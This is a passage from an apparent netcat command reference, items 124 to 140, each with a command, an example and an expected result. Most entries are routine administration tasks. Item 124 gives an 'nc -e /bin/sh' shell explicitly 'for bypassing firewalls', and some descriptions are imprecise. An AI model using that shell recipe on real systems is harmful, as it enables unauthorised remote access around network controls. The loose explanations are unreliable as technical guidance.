found"}' Expected Result: Prints "Error found" whenever the pattern 'error' is detected in incoming data. 124. Netcat for Bypassing Firewalls Command: nc -lvp [port] -e /bin/sh; nc [destination] [port] -e /bin/sh Description: Sets up a reverse shell to bypass firewall restrictions. Example: nc -lvp 4444 -e /bin/sh; nc 192.168.1.100 4444 -e /bin/sh Expected Result: Establishes a reverse shell between two systems, potentially bypassing firewalls. 125. Netcat for Network Speed Testing Command: nc -lvp [port] | pv -r > /dev/null; nc [destination] [port] < /dev/zero Description: Measures the network transfer speed between two hosts. Example: nc -lvp 1234 | pv -r > /dev/null; nc example.com 1234 < /dev/zero Expected Result: Shows the real-time data transfer rate to example.com on port 1234. 126. Netcat with OpenSSL for Encrypted Tunnels Command: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port [port]; nc --ssl [destination] [port] Description: Creates an encrypted tunnel using SSL. Example: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port 1234; nc --ssl example.com 1234 Expected Result: Sets up an SSL encrypted tunnel on port 1234 to example.com. 127. Netcat for MQTT Protocol Testing Command: mosquitto_pub -h [MQTT-server] -t 'test/topic' -m 'message' | nc [log-server] [log-port] Description: Tests MQTT protocol by publishing messages to a topic. Example: mosquitto_pub -h mqtt.example.com -t 'test/topic' -m 'Hello' | nc log.example.com 1234 Expected Result: Publishes 'Hello' to 'test/topic' on mqtt.example.com and logs it. 128. Netcat for Database Backup Streaming Command: mysqldump -u [user] -p[password] [database] | nc [destination] [port] Description: Streams a database backup to a remote location. Example: mysqldump -u root -ppassword mydb | nc example.com 1234 Expected Result: Streams a backup of 'mydb' to example.com on port 1234. 129. Netcat for Git Repository Cloning Command: git clone --bare [repo] repo.git; tar -czf - repo.git | nc [destination] [port] Description: Clones a Git repository and sends it over the network. Example: git clone --bare https://github.com/user/repo repo.git; tar -czf - repo.git | nc example.com 1234 Expected Result: Clones 'repo' and sends it to example.com on port 1234. 130. Netcat for Remote Printer Management Command: nc [printer-IP] [printer-port] < print-job-file Description: Sends a print job to a network printer. Example: nc 192.168.1.50 9100 < document.ps Expected Result: Prints 'document.ps' on the printer at 192.168.1.50:9100. 131. Netcat for Remote Disk Usage Analysis Command: nc -lvp [port] -e 'df -h' Description: Analyzes and reports disk usage on a remote system. Example: nc -lvp 1234 -e 'df -h' Expected Result: Sends disk usage information to a client connected to port 1234. 132. Netcat with Python for JSON Data Processing Command: nc -lvp [port] | python -m json.tool Description: Formats and validates JSON data received over the network. Example: nc -lvp 1234 | python -m json.tool Expected Result: Formats incoming JSON data for readability and validation. 133. Netcat for Network Trace Routing Command: traceroute [destination] | nc [log-server] [log-port] Description: Performs a network trace route and logs the results. Example: traceroute example.com | nc log.example.com 1234 Expected Result: Conducts a trace route to example.com and sends the results to log.example.com. 134. Netcat with Perl for Regex Processing Command: nc -lvp [port] | perl -pe 's/[regex]/[replacement]/g' Description: Uses Perl for real-time regular expression processing of incoming data. Example: nc -lvp 1234 | perl -pe 's/dog/cat/g' Expected Result: Replaces all occurrences of 'dog' with 'cat' in data received on port 1234. 135. Netcat for Remote System Temperature Monitoring Command: nc -lvp [port] -e 'sensors' Description: Monitors and reports the system temperature. Example: nc -lvp 1234 -e 'sensors' Expected Result: Sends system temperature information to a client connected to port 1234. 136. Netcat for Secure Shell Key Distribution Command: cat ~/.ssh/id_rsa.pub | nc [destination] [port] Description: Distributes an SSH public key to a remote host. Example: cat ~/.ssh/id_rsa.pub | nc example.com 1234 Expected Result: Sends the user's public SSH key to example.com on port 1234. 137. Netcat for Remote Log File Tail Command: nc -lvp [port] -e 'tail -f /var/log/syslog' Description: Streams the end of a log file in real-time. Example: nc -lvp 1234 -e 'tail -f /var/log/syslog' Expected Result: Streams the latest entries from the syslog to a client on port 1234. 138. Netcat for Email Fetching with POP3 Command: (echo 'USER [username]'; echo 'PASS [password]'; echo 'LIST'; echo 'QUIT') | nc [mail-server] 110 Description: Retrieves email list from a POP3 server. Example: (echo 'USER user'; echo 'PASS pass'; echo 'LIST'; echo 'QUIT') | nc mail.example.com 110 Expected Result: Logs into the POP3 server at mail.example.com and lists emails. 139. Netcat with Ruby for Script Execution Command: nc -lvp [port] -e 'ruby script.rb' Description: Executes a Ruby script upon receiving a network connection. Example: nc -lvp 1234 -e 'ruby script.rb' Expected Result: Runs 'script.rb' in Ruby when a client connects to port 1234. 140. Netcat for Streaming Media Files Command: nc -lvp [port] | mplayer - Description: Streams a media file to a player like mplayer. Example: nc -lvp 1234 | mplayer - Expected Result: Plays streaming media received on port 1234 using mplayer.